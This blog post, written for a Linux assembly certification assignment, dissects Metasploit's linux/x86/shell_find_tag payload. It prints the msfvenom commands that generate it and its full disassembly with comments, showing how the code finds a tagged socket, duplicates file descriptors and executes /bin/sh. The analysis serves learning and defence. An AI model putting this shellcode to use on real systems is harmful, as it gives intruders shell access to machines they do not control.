Analyzing Metasploit’s linux/x86/shell_find_tag payload

By August 27, 2018 SLAE-x86

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1134
Assignment number: 5.1
Github repo: https://github.com/kkirsche/SLAE


Introduction

Hey everyone! Today, we’re going to shift gears a little bit. Instead of writing our own assembly language, we’re instead going to analyze the work of someone else. This is pretty interesting to me because it actually highlighted a payload that I didn’t know about, which we’ll be discussing today.

Requirements

  • Take at least 3 shellcode samples created using msfvenom for x86 Linux
  • Use GDB, ndisasm, and/or libemu to dissect the functionality of the shellcode
  • Present your analysis

Awesome. So first off, this isn’t going to be the complete assignment 5, instead, this is going to first discuss the first of three shellcode samples generated using msfvenom for x86 Linux. I’ll be creating more articles to discuss the other two payloads. Otherwise, we can definitely meet the other two goals.

Our shellcode

So to get started, I had to choose what shellcode I was going to analyze. After looking through msfvenom’s payloads, I found the one which seemed like it’d be interesting — the linux/x86/shell_find_tag payload by Skape (same one that we encountered during our egg hunter work!).

If we take a look at what options we have, we see there are a fair number of them:

linux/x86/shell_find_tag payload options

Wow! That’s a fair number of them. Interestingly though, all of them are advanced options, so they’re going to be outside of scope for this discussion.

As a result, we’ll dive right into analyzing the payload.

Libemu

First, we’ll take a look at the payload with libemu. Libemu, if you aren’t familiar with it, is a library used to emulate things like raw shellcode and provide you with information about what it’s doing. In our case, we’re using it’s sctest binary with a few options. Specifically, we want to use it’s verbose output (-vvv), read the payload from stdin (-S) and perform 10000 steps (-s 10000) worth of iteration, if it’s available. This makes sure that we’ve fully processed the shellcode. We can do this with:

msfvenom -p linux/x86/shell_find_tag --platform linux -a x86 -e generic/none | sctest -vvv -Ss 10000

Oddly, unlike many times, while we got a large amount of output from sctest, it doesn’t seem to output any pseudocode for this payload. So let’s see if we can get a graphical representation of what’s happening instead.

msfvenom -p linux/x86/shell_find_tag --platform linux -a x86 -e generic/none | sctest -vvv -Ss 10000 -G shell_find_tag.dot && dot shell_find_tag.dot -T png > shell_find_tag.png

This will generate our payload, pass it to sctest which will process it an generate a dot file. The dotfile is then converted using graphviz’s dot binary into a PNG which we can view. And when we do this, we see:

shell_find_tag call graph

So it seems that libemu / sctest was able to read it, just not decide what the pseudocode should have been. Somewhat confusingly, we also end up with different shellcode (though similar to the graph above) when we use ndisasm -u – (which is shorthand to state this is 32-bit code:

ndisasm


msfvenom -p linux/x86/shell_find_tag --platform linux -a x86 -e generic/none | ndisasm -u -
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 69 (iteration=0)
generic/none chosen with final size 69
Payload size: 69 bytes
00000000 31DB xor ebx,ebx
00000002 53 push ebx
00000003 89E6 mov esi,esp
00000005 6A40 push byte +0x40
00000007 B70A mov bh,0xa
00000009 53 push ebx
0000000A 56 push esi
0000000B 53 push ebx
0000000C 89E1 mov ecx,esp
0000000E 86FB xchg bh,bl
00000010 66FF01 inc word [ecx] 00000013 6A66 push byte +0x66
00000015 58 pop eax
00000016 CD80 int 0x80
00000018 813E47354F4F cmp dword [esi],0x4f4f3547
0000001E 75F0 jnz 0x10
00000020 5F pop edi
00000021 89FB mov ebx,edi
00000023 6A02 push byte +0x2
00000025 59 pop ecx
00000026 6A3F push byte +0x3f
00000028 58 pop eax
00000029 CD80 int 0x80
0000002B 49 dec ecx
0000002C 79F8 jns 0x26
0000002E 6A0B push byte +0xb
00000030 58 pop eax
00000031 99 cdq
00000032 52 push edx
00000033 682F2F7368 push dword 0x68732f2f
00000038 682F62696E push dword 0x6e69622f
0000003D 89E3 mov ebx,esp
0000003F 52 push edx
00000040 53 push ebx
00000041 89E1 mov ecx,esp
00000043 CD80 int 0x80

This seems to make a bit more sense, so we’ll use this to dissect what’s actually happening.

What’s the assembly mean?

First function


00000000 31DB xor ebx,ebx
00000002 53 push ebx
00000003 89E6 mov esi,esp
00000005 6A40 push byte +0x40
00000007 B70A mov bh,0xa
00000009 53 push ebx
0000000A 56 push esi
0000000B 53 push ebx
0000000C 89E1 mov ecx,esp
0000000E 86FB xchg bh,bl
00000010 66FF01 inc word [ecx] 00000013 6A66 push byte +0x66
00000015 58 pop eax
00000016 CD80 int 0x80

So the first thing that jumps out here are lines 00000013 and 00000015, since we can quickly see that this is a socketcall operation. We’ll want to look this up so that we can see what the function signature we’re looking at actually looks like. In this case, at 00000007, we see mov bh, 0xa. If we look this up, 0xa is the SYS_RECV socketcall. This means we’re building the following function signature:

recv(int sockfd, void *buf, size_t len, int flags)

First, we see xor ebx, ebx which is clearing out the EBX register. This gives us a starting register structure of:

Address Instruction EAX EBX ECX EDX ESI
00000000 xor ebx, ebx Unknown 0x0000 Unknown Unknown Unknown

We then push EBX onto the stack which is the flags argument to SYS_RECV, and move a pointer to the dword zero into ESI, storing the pointer for us. Our registers now look like:

Address Instruction EAX EBX ECX EDX ESI
00000000 xor ebx, ebx Unknown 0x0000 Unknown Unknown Unknown
00000002 push ebx Unknown 0x0000 Unknown Unknown Unknown
00000003 mov esi, esp Unknown 0x0000 Unknown Unknown 0xffffd16c

We then push 0x40 (64 decimal) onto the stack as our size argument, meaning that we’re going to recv 64 bytes of data, and then move 0xa (10 decimal) into bh (the high portion of EBX, we’ll switch where this value is later).

Our registers now look like:

Address Instruction EAX EBX ECX EDX ESI
00000000 xor ebx, ebx Unknown 0x0000 Unknown Unknown Unknown
00000002 push ebx Unknown 0x0000 Unknown Unknown Unknown
00000003 mov esi, esp Unknown 0x0000 Unknown Unknown 0xffffd16c
00000005 push byte +0x40 Unknown 0x0000 Unknown Unknown 0xffffd16c
00000007 mov bh,0xa Unknown 0x0a00 Unknown Unknown 0xffffd16c

Cool, we have 0xa in bh now. We then push EBX onto the stack (0x0a00 hex / 2560 decimal) as our length argument, push ESI which is a pointer to the buffer we’re going to write to. Then we push EBX again, which pushes 0x0a00 onto the stack. At this point, our stack looks like this:

Function arguments on the stack

With our function arguments on the stack, we move a pointer to our arguments into ECX, exchange BH and BL (moving 0x0a into bl) and increment the value of the socket file descriptor value (remember that [ecx] gets the value of the pointer stored in ECX). This changes 0x0a00 to 0x0a01. Note that this is our socket file descriptor. We then push 0x66 (socketcall system call) onto the stack and pop it into EAX. With that complete, we trigger our system call. Throughout this, our registers progress like so:

Address Instruction EAX EBX ECX EDX ESI
00000000 xor ebx, ebx Unknown 0x0000 Unknown Unknown Unknown
00000002 push ebx Unknown 0x0000 Unknown Unknown Unknown
00000003 mov esi, esp Unknown 0x0000 Unknown Unknown 0xffffd16c
00000005 push byte +0x40 Unknown 0x0000 Unknown Unknown 0xffffd16c
00000007 mov bh,0xa Unknown 0x0a00 Unknown Unknown 0xffffd16c
00000009 push ebx Unknown 0x0a00 Unknown Unknown 0xffffd16c
0000000A push esi Unknown 0x0a00 Unknown Unknown 0xffffd16c
0000000B push ebx Unknown 0x0a00 Unknown Unknown 0xffffd16c
0000000C mov ecx,esp Unknown 0x0a00 0xffffd15c Unknown 0xffffd16c
0000000E xchg bh,bl Unknown 0x000a 0xffffd15c Unknown 0xffffd16c
00000010 inc word [ecx] Unknown 0x000a 0xffffd15c Unknown 0xffffd16c
00000013 push byte +0x66 Unknown 0x000a 0xffffd15c Unknown 0xffffd16c
00000015 pop eax 0x0066 0x000a 0xffffd15c Unknown 0xffffd16c
00000016 int 0x80 0xfffffff7 0x000a 0xffffd15c Unknown 0xffffd16c

So with that knowledge, we can comment this first block like so:


00000000 31DB xor ebx,ebx ; zero out EBX
00000002 53 push ebx ; push 0x0 as where we'll write our buffer
00000003 89E6 mov esi,esp ; store a pointer to the argument in ESI
00000005 6A40 push byte +0x40 ; MSG_DONTWAIT flag
00000007 B70A mov bh,0xa ; 0x0a00 will be the len
00000009 53 push ebx ; push 0x0a00 onto the stack for our len argument
0000000A 56 push esi ; push the pointer to our buffer onto the stack
0000000B 53 push ebx ; 0x0a00 onto the stack for our sockfd
0000000C 89E1 mov ecx,esp ; pointer to our function arguments
0000000E 86FB xchg bh,bl ; make EBX 0x000a for our SYS_RECV socketcall
00000010 66FF01 inc word [ecx] ; increment our sockfd from 0x0a00 to 0x0a01
00000013 6A66 push byte +0x66 ; push socketcall onto number onto the stack
00000015 58 pop eax ; pop the value into EAX
00000016 CD80 int 0x80 ; perform the socketcall

Awesome! We understand the first block of this.

Second function


00000010 66FF01 inc word [ecx] ; increment our sockfd from 0x0a00 to 0x0a01
00000013 6A66 push byte +0x66 ; push socketcall onto number onto the stack
00000015 58 pop eax ; pop the value into EAX
00000016 CD80 int 0x80 ; perform the socketcall
00000018 813E47354F4F cmp dword [esi],0x4f4f3547
0000001E 75F0 jnz 0x10
00000020 5F pop edi
00000021 89FB mov ebx,edi
00000023 6A02 push byte +0x2
00000025 59 pop ecx
00000026 6A3F push byte +0x3f
00000028 58 pop eax
00000029 CD80 int 0x80
0000002B 49 dec ecx
0000002C 79F8 jns 0x26

So first, we compare the value in ESI with a set of bytes. These bytes translate from 0x4f4f3547 to G5OO (switching the byte order from little endian to human readable). This is the TAG option from the advanced options section which is used to signify the connection. If we didn’t receive it, we jump back to 00000010 which is our inc [ebx] command (incrementing our socket file descriptor), and repeating the socketcall to recv. This is a jump not zero because 0 is true, 1 is false. Essentially we’re looping through the socket file descriptors until we find the connection that we want to execute. This repeats 00000010 through 0000001E until we find the socket.

When we do find the socket, we pop the socketfd into EDI (remember that we’ve been incrementing the file descriptor on the stack) we begin the process we used for our bind shell and reverse shells via dup2 to connect stdin, stdout and stderr to the socket. With this knowledge, we can comment the code like so:


00000010 66FF01 inc word [ecx] ; increment our sockfd from 0x0a00 to 0x0a01
00000013 6A66 push byte +0x66 ; push socketcall onto number onto the stack
00000015 58 pop eax ; pop the value into EAX
00000016 CD80 int 0x80 ; perform the socketcall
00000018 813E47354F4F cmp dword [esi],0x4f4f3547 ; compare the value we received in our buffer to G5OO
0000001E 75F0 jnz 0x10 ; if we didn't find our tag, jump back to 00000010 so we can look at the next socket
00000020 5F pop edi ; we found it! pop sockfd into EDI
00000021 89FB mov ebx,edi ; save sockfd in EBX for our dup2 calls
00000023 6A02 push byte +0x2 ; we want to do three iterations of dup2 (2, 1, and 0) so we push the value
00000025 59 pop ecx ; then pop it into ECX
00000026 6A3F push byte +0x3f ; 0x3f is the dup2 syscall
00000028 58 pop eax ; which we need in EAX for our function call
00000029 CD80 int 0x80 ; execute dup2
0000002B 49 dec ecx ; decrement our counter
0000002C 79F8 jns 0x26 ; if we haven't hit the signed flag (-1), we're not done looping yet. Go back to the dup2 call at 00000026

Third / Final Function


0000002E 6A0B push byte +0xb
00000030 58 pop eax
00000031 99 cdq
00000032 52 push edx
00000033 682F2F7368 push dword 0x68732f2f
00000038 682F62696E push dword 0x6e69622f
0000003D 89E3 mov ebx,esp
0000003F 52 push edx
00000040 53 push ebx
00000041 89E1 mov ecx,esp
00000043 CD80 int 0x80

Onto our last function call! We first push 0xb onto the stack and pop it into EAX. If you remember, 0xb is the execve system call. We then clear EDX using CDQ. 00000032–00000038 we push /bin//sh with a null terminator onto the stack (the command we want to execute). We put a pointer to the command string into EBX, push a null value, onto the stack via push edx, push a pointer to the byte array onto the stack, and move the pointer into ECX. We then call the function and execute our function giving us a shell on the existing socket connection.

With comments, this looks like:

0000002E 6A0B push byte +0xb ; push the execve system call onto the stack
00000030 58 pop eax ; and pop it onto the stack
00000031 99 cdq ; zero out EDX
00000032 52 push edx ; NULL string terminator
00000033 682F2F7368 push dword 0x68732f2f ; hs//
00000038 682F62696E push dword 0x6e69622f ; nib/
0000003D 89E3 mov ebx,esp ; pointer to /bin//sh into EBX
0000003F 52 push edx ; push NULL function argument
00000040 53 push ebx ; push /bin//shNULL pointer
00000041 89E1 mov ecx,esp ; move pointer to /bin//shNULL into ECX
00000043 CD80 int 0x80 ; and pop our shell

Putting it all together

Now that we’ve commented the shellcode, let’s put the individual pieces together so that we have the full picture of what’s happening.


00000000 31DB xor ebx,ebx ; zero out EBX
00000002 53 push ebx ; push 0x0 as where we'll write our buffer
00000003 89E6 mov esi,esp ; store a pointer to the argument in ESI
00000005 6A40 push byte +0x40 ; MSG_DONTWAIT flag
00000007 B70A mov bh,0xa ; 0x0a00 will be the len
00000009 53 push ebx ; push 0x0a00 onto the stack for our len argument
0000000A 56 push esi ; push the pointer to our buffer onto the stack
0000000B 53 push ebx ; 0x0a00 onto the stack for our sockfd
0000000C 89E1 mov ecx,esp ; pointer to our function arguments
0000000E 86FB xchg bh,bl ; make EBX 0x000a for our SYS_RECV socketcall
00000010 66FF01 inc word [ecx] ; increment our sockfd from 0x0a00 to 0x0a01
00000013 6A66 push byte +0x66 ; push socketcall onto number onto the stack
00000015 58 pop eax ; pop the value into EAX
00000016 CD80 int 0x80 ; perform the socketcall
00000018 813E47354F4F cmp dword [esi],0x4f4f3547 ; compare the value we received in our buffer to G5OO
0000001E 75F0 jnz 0x10 ; if we didn't find our tag, jump back to 00000010 so we can look at the next socket
00000020 5F pop edi ; we found it! pop sockfd into EDI
00000021 89FB mov ebx,edi ; save sockfd in EBX for our dup2 calls
00000023 6A02 push byte +0x2 ; we want to do three iterations of dup2 (2, 1, and 0) so we push the value
00000025 59 pop ecx ; then pop it into ECX
00000026 6A3F push byte +0x3f ; 0x3f is the dup2 syscall
00000028 58 pop eax ; which we need in EAX for our function call
00000029 CD80 int 0x80 ; execute dup2
0000002B 49 dec ecx ; decrement our counter
0000002C 79F8 jns 0x26 ; if we haven't hit the signed flag (-1), we're not done looping yet. Go back to the dup2 call at 00000026
0000002E 6A0B push byte +0xb ; push the execve system call onto the stack
00000030 58 pop eax ; and pop it onto the stack
00000031 99 cdq ; zero out EDX
00000032 52 push edx ; NULL string terminator
00000033 682F2F7368 push dword 0x68732f2f ; hs//
00000038 682F62696E push dword 0x6e69622f ; nib/
0000003D 89E3 mov ebx,esp ; pointer to /bin//sh into EBX
0000003F 52 push edx ; push NULL function argument
00000040 53 push ebx ; push /bin//shNULL pointer
00000041 89E1 mov ecx,esp ; move pointer to /bin//shNULL into ECX
00000043 CD80 int 0x80 ; and pop our shell

This gives us a complete understanding of how the linux/x86/shell_find_tag payload works

Kevin Kirsche

Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.

More posts by Kevin Kirsche

Leave a Reply